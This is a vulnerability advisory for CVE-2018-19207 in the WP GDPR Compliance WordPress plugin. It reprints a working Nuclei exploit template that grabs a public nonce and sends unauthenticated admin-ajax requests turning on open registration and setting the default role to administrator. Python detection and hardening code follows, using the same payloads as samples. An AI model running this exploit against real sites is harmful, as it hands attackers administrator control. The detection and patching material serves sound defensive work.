CVE-2018-19207: WP GDPR Compliance < 1.4.3 - Unauthenticated Call Any Action or Update Any Option

Date: 2025-08-01 | Affected software: WP GDPR Compliance | PoC: public

Vulnerability description

The WP GDPR Compliance plugin allows unauthenticated users to execute any action and update any database value. This vulnerability is due to the lack of proper validation in the Includes/Ajax.php file.

PoC code [public]

id: CVE-2018-19207

info:
  name: WP GDPR Compliance < 1.4.3 - Unauthenticated Call Any Action or Update Any Option
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    The WP GDPR Compliance plugin allows unauthenticated users to execute any action and update any database value. This vulnerability is due to the lack of proper validation in the Includes/Ajax.php file.
  reference:
    - https://wpvulndb.com/vulnerabilities/9157
    - https://github.com/aeroot/WP-GDPR-Compliance-Plugin-Exploit
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-19207
    cwe-id: CWE-425
    epss-score: 0.87744
    epss-percentile: 0.99438
    cpe: cpe:2.3:a:van-ons:wp-gdpr-compliance:*:*:*:*:*:wordpress:*:*
  metadata:
    vendor: van-ons
    product: wp-gdpr-compliance
    framework: wordpress
    publicwww-query: "wp-content/plugins/wp-gdpr-compliance/"
    verified: true
  tags: cve,cve2018,wordpress,wp-plugin,wp-gdpr-compliance,rce

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    extractors:
      - type: regex
        name: nonce
        part: body
        regex:
          - 'var wpgdprcData.*"ajaxSecurity":"([a-z0-9]+)"'
        group: 1
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wpgdprc_process_action&security={{nonce}}&data={"type":"save_setting","append":false,"option":"users_can_register","value":"1"}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wpgdprc_process_action&security={{nonce}}&data={"type":"save_setting","append":false,"option":"default_role","value":"administrator"}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"message":""'
          - '"error":""'
        condition: and

      - type: word
        part: content_type_2
        words:
          - 'application/json'
# digest: 4a0a00473045022037fc6455666e240c909fbaf1437c1451e1d1701999ef30dc95896b8b2579ad58022100f89bf503236cc36789a2d6e263fe13a2266b684c3139e1f6ff0c8a5460b05bf0:922c64590222798bb761d5b6d8e72950
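The description above states the defect (the AJAX handler writes whatever option name the request carries, with no capability check), and the template shows what the abuse traffic looks like: a `wpgdprc_process_action` POST whose `data` JSON sets `users_can_register` and `default_role`. The following Python is an added example, not code from the page or from the plugin: it parses such `admin-ajax.php` POST bodies, flags writes to WordPress core options, and models the hardened server-side check (option allowlist plus capability check) that a patched handler needs. The `wpgdprc_` option prefix, the `HIGH_RISK_OPTIONS` set, the sample bodies and the `wpgdprc_settings_example` option name are assumptions constructed for this example.

```python
import json
from urllib.parse import parse_qs

# Assumption: options the plugin legitimately owns share this prefix.
PLUGIN_OPTION_PREFIX = "wpgdprc_"

# Core WordPress options whose rewrite is the abuse path shown in the PoC
# (users_can_register / default_role) plus a few others an attacker would target.
HIGH_RISK_OPTIONS = {"users_can_register", "default_role", "admin_email", "siteurl", "home"}


def parse_process_action(body):
    """Decode a wpgdprc_process_action POST body into (type, option, value).

    Returns None when the body is not for that action, and "malformed" when the
    action matches but the data field is not a JSON object.
    """
    params = parse_qs(body, keep_blank_values=True)
    if params.get("action", [None])[0] != "wpgdprc_process_action":
        return None
    try:
        data = json.loads(params.get("data", [""])[0])
    except json.JSONDecodeError:
        return "malformed"
    if not isinstance(data, dict):
        return "malformed"
    return data.get("type"), data.get("option"), data.get("value")


def option_is_plugin_owned(option):
    """Allowlist check: only plugin-prefixed option names may be written."""
    return isinstance(option, str) and option.startswith(PLUGIN_OPTION_PREFIX)


def classify(body):
    """Detection verdict for one request body (for log review / WAF rules)."""
    parsed = parse_process_action(body)
    if parsed is None:
        return "ignore"
    if parsed == "malformed":
        return "malformed"
    kind, option, _value = parsed
    if kind != "save_setting":
        return "other"
    if option in HIGH_RISK_OPTIONS:
        return "critical"      # core option rewrite: the CVE-2018-19207 pattern
    if not option_is_plugin_owned(option):
        return "suspicious"    # arbitrary option outside the plugin's namespace
    return "allowed"


def hardened_save_setting(body, user_can_manage_options):
    """Model of the fixed handler: nonce possession is not authorization.

    The nonce the PoC extracts is served to anonymous visitors, so the handler
    must also require a capability and restrict the writable option names.
    """
    if not user_can_manage_options:
        return "rejected: missing manage_options capability"
    parsed = parse_process_action(body)
    if parsed is None or parsed == "malformed":
        return "rejected: bad request"
    kind, option, _value = parsed
    if kind != "save_setting":
        return "rejected: unsupported type"
    if not option_is_plugin_owned(option):
        return "rejected: option not allowed"
    return "applied"


# Constructed sample bodies (security value and option name are placeholders).
SAMPLE_BODIES = [
    'action=wpgdprc_process_action&security=deadbeef00&data={"type":"save_setting",'
    '"append":false,"option":"users_can_register","value":"1"}',
    'action=wpgdprc_process_action&security=deadbeef00&data={"type":"save_setting",'
    '"append":false,"option":"default_role","value":"administrator"}',
    'action=wpgdprc_process_action&security=deadbeef00&data={"type":"save_setting",'
    '"append":false,"option":"wpgdprc_settings_example","value":"1"}',
    'action=wpgdprc_process_action&security=deadbeef00&data={"type":"save_setting",'
    '"append":false,"option":"some_other_option","value":"x"}',
    'action=wpgdprc_process_action&security=deadbeef00&data=not-json',
    'action=heartbeat&_nonce=abc&data=%7B%7D',
]


def scan(bodies):
    """Return (verdict, body) pairs for every body in the input."""
    return [(classify(b), b) for b in bodies]


if __name__ == "__main__":
    for verdict, body in scan(SAMPLE_BODIES):
        print(f"{verdict:10s} {body[:80]}")
    print(hardened_save_setting(SAMPLE_BODIES[0], user_can_manage_options=False))
```

Two things the example makes concrete: the JSON `data` parameter rides inside a normal form body, so a rule keyed only on `action=wpgdprc_process_action` is too coarse and one keyed on `default_role` alone misses the `users_can_register` step; and because the template pulls `ajaxSecurity` from the unauthenticated front page, a handler that checks the nonce but not a capability is still open.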